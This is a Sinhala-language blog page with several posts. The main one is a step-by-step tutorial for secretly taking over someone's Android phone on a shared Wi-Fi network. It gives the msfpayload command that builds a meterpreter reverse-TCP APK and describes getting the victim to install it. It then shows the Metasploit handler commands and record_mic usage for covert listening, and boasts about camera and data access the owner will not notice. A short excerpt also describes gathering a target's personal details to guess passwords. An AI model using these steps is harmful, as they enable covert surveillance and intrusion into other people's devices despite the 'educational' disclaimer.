Showing posts with label Linux. Show all posts
Showing posts with label Linux. Show all posts

Wifi එකේ තියෙන Android Phone එකක් Hack කරමු. (Wifi #1)

8:40 AM 1 Comment
මේ දවස් වල ඔක්කොලගේම අතේ smart phone නේ ඉතින්... අනික යන යන තැන Wifi.. Office එකෙයි ගෙදරයි හැම තැනම.. Phone කොයිවෙල්ත් Connected.. අද කියල දෙන විදියෙන් පුළුවන් යාලුවගෙ හරි තමන්ගේ හරි කාගේ හරි Phone එකක් සම්පූර්නයෙන්ම Access කරන්න.. Camera දෙකම පාවිච්චි කරලා වටේ වෙන්නේ මොනාද බලන්න පුළුවන්,  Mic  එක use කරලා අහන් ඉන්න පුළුවන්, ෆොනේ එකේ Data access කරන්නද ඕනේ එකක් කර ගත්තෙකි..
මේ method  Wifi නැතිව DATA on කරන ඉන්න වෙලාවට උනත් පාවිච්චි කරන්න පුළුවන් පොඩි පොඩි වෙනස් කම් කීපයකින්.. හැබැයි මේ Post  එකන් නම් කියන්නේ Wifi එක ඇතුලෙදි (LAN එක ඇතුලෙදි)කරගන්න විදිය..
හරි අපි බලමු කරගන්නේ කොහොමද කියලා.. ඔන්න ඉතින් කාලෙකට පස්සේ ඇත්තටම කිව්වොත් අවුරුදු 2කට පස්සේ තමා Post එකක් දාන්න හිතුනේ. බ්ලොග් එකෙත් පොඩි පොඩි වෙනස් කම් කීපයක් කරා.. මතක ඇති අපි කලිනුත් කතාකරලා තියෙනවා Backtrack, Kali Linux ගැන එහෙම.. මන් මෙකෙදි use කරන්නේ Kali Linux OS එක.. ළග නැත්තන් මෙතැන Click කරලා Download කරගන්න පුළුවන්.. මෙක Live CD එකක් විදියට use කරන්න පුළුවන් නිසා OS ගහ ගහ ඉන්න ඕනේ නැ.. නැත්තන් මන් කලින් කියලදිල තියෙනවා Virtual PC එකක් හදන හැටි.. Kali Linux එක run උනාට පස්සේ එන්නේ මේ වගේ environment එකක්...


එකේ පෙන්නලා තියෙන තැන click කරලා Terminal එක Open කරගන්න..

එකෙදි ifconfig කියන command එක use කරලා තමන්ගේ internal ip එක බලාගන්න..



තව Terminal එකක් open කරගෙන පහල command එක type කරන්න..

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 R > install.apk




මේක හරියටම type කරලා තියෙන්න ඕනා..  LHOST එකේ 192.168.1.101 වෙනුවට අර කලින් බලාගත්ත තමන්ගේ ip එක add කරන්න.. දෙපාරක් check කරන්න Enter කරන්න කලින්... දැන් apk file එක ready.. කස්ටිය ඔය වගේ hack කරන software දාගෙන හොයනවා නේ.. ඔන්න දැන් අපිම එකක් හදා ගත්ත..
හරි දැන් Home folder එකේ ඇති apk file එක...



ඔය file එක upload කරලා access කරන්න ඕනේ කරන phone එකට download කරල install කරන්න.. නැත්තන් apk එක bluetooth කරන්න පුළුවන් නැත්තන් mail එකක් දාන්න.. කැමති විදියකට.. එකේදී unknown sources tic එක දාන්න අමතක කරන්න එපා..


ඊළගට තව terminal එකක් open කරගෙන type කරන්න msfconsole කියලා.. ඊට පස්සේ Enter කරන්න.. open වෙන්න ටික වෙලාවක් යයි.. එන්නේ මේ වගේ එකක්..


ඔන්න ඔය එන තැන ඉදන් තමා වැඩ පටන් ගන්නේ.. කලින් සැරේ වගේමයි.. spelling හරියට type කරන්න.. spaces හරියට තියන්න.. පහල තියෙන එක type කරලා enter කරන්න..

use exploit/multi/handler

ඊළගට set payload android/meterpreter/reverse_tcp type කරලා enter කරන්න..
ඊට පස්සේ set LHOST 192.168.1.101 type කරලා enter කරන්න අර type කරපු ip එක ඔයාලගේ ip එක වෙන්න ඕන අර apk එක හදන අවස්ථාවේදී දුන්න එක..
ඊළගට exploit කියල type කරලා enter කරන්න.. එතකොට තියෙන්නේ මේ වගේ...


දැන් අර apk එක run වෙනවා නම් හරි.. එ කියන්නේ අර user දැන් wifi එකට connect වෙලා ඉන්න ඕන..

දැන් මේ වගේ Lines දෙකක් එනවා කියන්නේ වැඩේ ගොඩ.. දැන් අර phone එකේ ඕන දෙයක් ඔයාලට කරන්න පුළුවන්.. අපි බලමු run කරන්න පුළුවන් commands ටිකක්.. ඔතන help කියල ගැහුවා නම් කරන්න පුළුවන් ඔක්කොම ටික පෙන්නනවා..
අපි උදාහරණයකට ගමු record_mic කියන එක.. ඔයාලා command එක use කරන්න දන්නේ නැත්තන් කරන්න තියෙන්න record_mic -h කියලා type කරලා enter කරන එක එතකොට පෙන්නනවා එක use කරන විදිය..
මේ වගේ ඔයාලට command එක හදාගන්න පුළුවන් දැන්...
record_mic -d 30 -f -p 
ඔන්න ඔය වගේ.. -d එකන් කියවෙන්නේ කාලය තප්පර වලින් මේකෙදි 30ක් දීල තියෙනවා.. -f කියන්නේ path එක එන විදිය ඕනේ නම් වෙනස් කරගන්න පුළුවන්.. -p වලින් කියවෙන්නේ record එක අවසානයේදී එක play වෙනවා කියන එක..
ඔන්න ඔය වගේ ඔයාලට අනිත් කෙනාගේ phone එකේ ඕනේ තරම් දේවල් කරන්න පුළුවන් එයාට දැනෙන්නේ නැති වෙන්න..
කාලෙකින් ලියපූ පලවෙනි post එක හිතුවට වඩා දිග උනා.. ඉස්සරහට නම් දිගටම post දාන බලාපොරොත්තු වෙනවා..  මොනා හරී අවුලක් අවොත් comment කරන්න.. මේක Educational Purposes only  හරිය.. කැත වැඩ කරන්න පාවිච්චි කරන්න එපා.. LAN  වලට වගේම WAN වලටත් මෙක පොඩි පොඩි වෙනස් කම් කීපයකින් පාවිච්චි කරන්න පුළුවන්.. Try කරලා බලන්න..  ඉස්සරහට computer එකක් මේ විදියට access කරන විදිය කියල දෙන්නම්...

එහෙනම් මේ Lesson එකෙන් ඔයාල මොන හරි දෙයක් ගත්ත නම්, Like එකක් Comment එකක් දාලම යන්න...

PC එක ඇතුලේ තව PC එකක් හදමු....

10:52 PM Add Comment
කලින් මන් SandBox කියලා software එකක් දුන්නා නේ.. අන්න එකේදී මන් කිව්වා Virtual PC ගැන.. ගොඩක් අය එක ගැන දන්නේ නැ කියලා කිව්ව නිසා Virtual PC ගැන Post එකක් දාන්න හිතුවා... එක කියවපු නැති අය ඉන්නවා නම් මෙතනින් යන්න... අපිට පුළුවන් අපේ Computer එක ඇතුලේ තව Computer එකක් හදන්න.. එකට අපිට වෙනම Software එකක් පාවිච්චි කරන්න වෙනවා..

Social Engineering ක්‍රමේට Password Hack කරමු... (Pw #2)

5:19 AM Add Comment
Password ගැන දෙවෙනි Lesson එක මේක... පලවෙනි එක බැලුවේ නැති අය මෙතනින් ගිහින් එක බලන්න... හරි අපි බලමු මේ Social Engineering කියන ක්‍රමේ මොකක් ද කියලා... මේකෙදි කරන්නේ අපි Hack කරන්න ඕනේ පුද්ගලයා සම්බන්ද විස්තර හොයන එක.. එයාගේ උපන්දිනය, එයාගේ වගේම එයාගේ ලගම අයගේ නම්, දුරකතන අංක, ID එකේ අංකය.. එයා අසා ගායකයෝ, චිත්‍රපටි, වාහන වගේ මෙකි නොකී හැම කෙහෙල් මලක්ම එකතු කරනවා..

Website එකක් එහෙම්පිටින්ම PC එකට Download කරමු...

9:04 AM Add Comment
website එකක් බලන්න Internet තියෙන්නම ඕනෙද නැනේ... internet තියෙන වෙලාවක Website එක download කරගන්න.. පස්සේ වෙලාවක බලන්න පුළුවන් නේ... මේ වැඩේ කරන්නෙත් පොඩි software එකකින්.... සාමානයෙන් අපි Ctrl + S ගහල webpage එකක් save කරගත්තට අපිට බෑනේ එකේ link වලට යන්න.. එ website එකේ අනිත් pages බලන්න.. මේ software එකෙන් පුළුවන් Site එක සම්පුර්ණයෙන්ම Download  කරන්න... මේක Website Copier එකක්...

Free Online Virtual PC එකක් හදාගමුද...?

8:55 PM Add Comment
අපේ ගෙදර Desktop එක හැමතැනම උස්සන් යන්න බැනේ.. ලැප් එකක් උනත් කරදරයි නේ... අපේම කියලා Online Virtual PC එකක් නැත්තන් Personal Cloud එකක් තිබ්බ නම් පට්ට නේ Internet තියෙන ඕනෙම තැනකින් ලොග් වෙන්නත් පුළුවන් නේ... මේකෙන් අපේ Browser එක Desktop එකක් කොරගන්න පුළුවන්.. තව මේක ඇතුලෙන් internet use කරන්නද අරවද මේවද ඔක්කොම පුළුවන්.. අනික මේක PC එකකින් විතරක් නෙමේ iPhone, iPod, Android Phone වගේ ඕනේ එකකින් පාවිච්චි කරන්න පුළුවන්...